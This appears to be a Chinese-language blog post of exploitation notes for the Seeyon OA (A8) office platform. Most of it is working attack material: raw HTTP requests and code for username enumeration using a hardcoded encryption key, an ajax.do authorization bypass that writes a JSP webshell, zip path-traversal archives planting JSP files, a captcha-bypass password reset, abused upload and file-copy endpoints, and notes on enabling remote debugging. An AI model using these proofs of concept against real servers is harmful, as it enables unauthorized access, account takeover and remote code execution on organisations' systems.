用户名遍历
/seeyon/rest/password/retrieve/send/username
通过绑定来遍历用户是否存在
高版本中设置加密传输,修改请求为post+json
/seeyon/rest/password/retrieve/send {"loginName":"gJ90ikKmIGY="}
加密算法:
import java.util.Base64; import javax.crypto.spec.DESedeKeySpec; import javax.crypto.*; import javax.crypto.spec.DESedeKeySpec; import javax.crypto.spec.IvParameterSpec; import java.security.Key; public class Main { public static void main(String[] args) { String pass="sysadmin"; try { DESedeKeySpec spec = new DESedeKeySpec("m1yanfa@seeyon.com119$#M1#$".getBytes()); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("desede"); Key deskey = keyFactory.generateSecret(spec); Key secretKey = keyFactory.generateSecret(spec); Cipher cipher = Cipher.getInstance("desede/CBC/PKCS5Padding"); IvParameterSpec ips = new IvParameterSpec("01234567".getBytes()); cipher.init(1, deskey, ips); byte[] secData=cipher.doFinal(pass.getBytes()); String enData=Base64.getEncoder().encodeToString(secData); System.out.println(enData); }catch(Exception e){ } } }
ajax.do权限绕过
分析文章:某OA ajax.do处漏洞分析
低版本常见漏洞,通过解析差异来绕过路由限制,文中给出autoinstall.do路由来绕过
poc:
生成gzip数据
import com.seeyon.ctp.common.excel.DataRecord; import com.seeyon.ctp.common.log.CtpLogFactory; import com.seeyon.ctp.util.ZipUtil; import com.seeyon.ctp.util.json.JSONUtil; import org.apache.commons.logging.Log; import java.net.URLEncoder; import java.util.ArrayList; public class fileToExcelManagerPayload { private static final Log LOGGER = CtpLogFactory.getLog(fileToExcelManagerPayload.class); public static void main(String[] args) { DataRecord d = new DataRecord(); String[] c = {"\"\r\n"+"<% out.println(\"ttttttttt\"); %>"+"\"\r\n"}; d.setColumnName(c); String dd = JSONUtil.toJSONString(d); final ArrayList<Object> list = new ArrayList<>(); list.add("../webapps/ROOT/x.jsp"); list.add("\"\""); list.add(d); final String list1 = JSONUtil.toJSONString(list); String strArgs = ZipUtil.compressResponse(list1, "gzip", "UTF-8", LOGGER); System.out.println(URLEncoder.encode(strArgs)); System.out.println("end"); } }
数据包:
POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1
Host: xxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 6357
managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&requestCompress=gzip&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C3%81%0A%C3%820%10D%7F%C2%A5%2C%14%14B%C3%A2%C2%B9%C2%8A%C3%A7%1E%C3%84%C2%82%14%3C4%3D%C2%A46%C3%98H%C2%9A%C2%84dC%05%C3%B1%C3%9FM%09zp%C3%B64%C2%8F%C3%A5M%07%C2%94%C2%B2E%0E%C3%82%C2%B9%C3%80.M%C3%93%C2%B2%27%7D%04%07%04x%3A+%2F%C2%B8Y%1Dgs%16%C2%B3%C2%84%C2%AA%5B%C2%A9%C3%A7%C3%A6P%166%22u%5E%19%C3%94f%C3%83%01%C2%BF%C3%A1%C2%B0%C3%9D%17%C3%A51%C2%BFAO%60%14%28j%29%C3%86%C2%93%0A%C2%98%04%C2%89d%C3%A1U%C3%A1%04%C2%95%C2%89Z%13%08%C2%93%C2%94%C2%98%172%40%C2%85%C3%BAWB%1C%C3%9A%C2%BF%5EKu%C2%9F%C2%92nG%C3%80%C3%9Be%C3%95%C2%BE%C3%BB%0F%C3%8BJZ%C2%B7%C3%8A%00%00%00后台文件解压
原理都是低权限用户上传zip时,解压时目录穿越上传jsp
跟ofd不同在于一次性完成,且调用接口不同
上传数据包构造:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> <body> <h1>uploadFile</h1> <form action="http://192.168.203.25/seeyon/workflow/cie.do?method=impo rtProcess" method="post" enctype="multipart/form-data"> <p><input type="file" name="file"></p> <p><input type="submit" value="submit"></p> </form> </body> </html>
压缩包生成:
import zipfile if __name__ == "__main__": file = "h1.jsp" try: with open(file, "r") as f: binary = f.read() zipFile = zipfile.ZipFile("t2.zip", "a", zipfile.ZIP_DEFLATED) info = zipfile.ZipInfo("test.zip") zipFile.writestr("..\\..\\webapps\\ROOT\\bak1.jsp", binary) zipFile.close() except IOError as e: raise e
低版本接口:cie.do
poc:
POST /seeyon/workflow/cie.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip
zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--高版本接口:designer.do
poc:
POST /seeyon/workflow/designer.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip
zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--用户密码重置
老洞,验证码绕过重置密码
poc:
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 192.168.136.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 45
Content-Type: application/json
Accept-Encoding: gzip
{"loginName": "test","password":"1qaz@WSX"}后台文件上传点
都会过滤jsp,要配合加密使用
调用save时会保存id,可以跟ofd配合,部分则只是上传
save上传,位置在base/upload/2024/01/01/id
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.zip"
Content-Type: text/plain
111
--59229605f98b8cf290a7b8908b34616b--普通上传,位置在base/upload/2024/01/01/id
POST /seeyon/fileUpload.do?method=processUpload&type=1&applicationCategory=1&extensions=jpg,gif,jpeg,png&maxSize=5242880&callback=imgUploadCallBack&closeWindow=false&serverTime=true HTTP/1.1 Host: 192.168.144.1 Content-Length: 199 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDmqbiz5fkZYKfWPI User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224 Connection: close ------WebKitFormBoundaryDmqbiz5fkZYKfWPI Content-Disposition: form-data; name="upload"; filename="image.gif" Content-Type: image/gif gif89a achaeaf ------WebKitFormBoundaryDmqbiz5fkZYKfWPI--
save上传,位置在base/resources/portal/css/id
POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=57507 HTTP/1.1 Accept: */* Host: 192.168.1.11 Connection: close User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321) Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C4046122 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 65 arguments=%5B%22aaaaa%22%5D&managerMethod=generateCssFileByCssStr
ofd解压漏洞
需要普通用户权限,本质是zip解压目录穿越,v8以上的版本基本修复
上传还是老接口
上传后获取id,搜索fileurls=fileurls,后面就是id了
解压接口
POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=govdocGBManager&rnd=29981 HTTP/1.1 Accept: */* CSRFTOKEN: Host: 192.168.246.4 Connection: close User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321) Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 63 arguments=["-7373142480696292225"]&managerMethod=getOfdMetadata
还可以试试这个接口,区别不大
GET /seeyon/content/content.do?method=invokingForm&extensions=zip&isNew=1&ofdFileId=-3217079395985044654&subApp=2 HTTP/1.1
Accept: */*
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflatecopy文件
copy文件到新位置,可以目录穿越和改后缀
POST /seeyon/ajax.do?method=ajaxAction&managerName=cipSynSchemeManager&rnd=29981 HTTP/1.1 Accept: */* Host: 192.168.1.11 Connection: close User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321) Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224; Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 134 arguments=["../../../../upload/2024/01/08/-3156853247588808973","../../ApacheJetspeed/webapps/ROOT/1234.jsp"]&managerMethod=copyFile
A8安装
先启动s1 agent,然后通过web页面启动a8服务
开启远程调试在ApacheJetspeed\bin\startup.bat里增加一行SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000,重启a8服务
Comments | NOTHING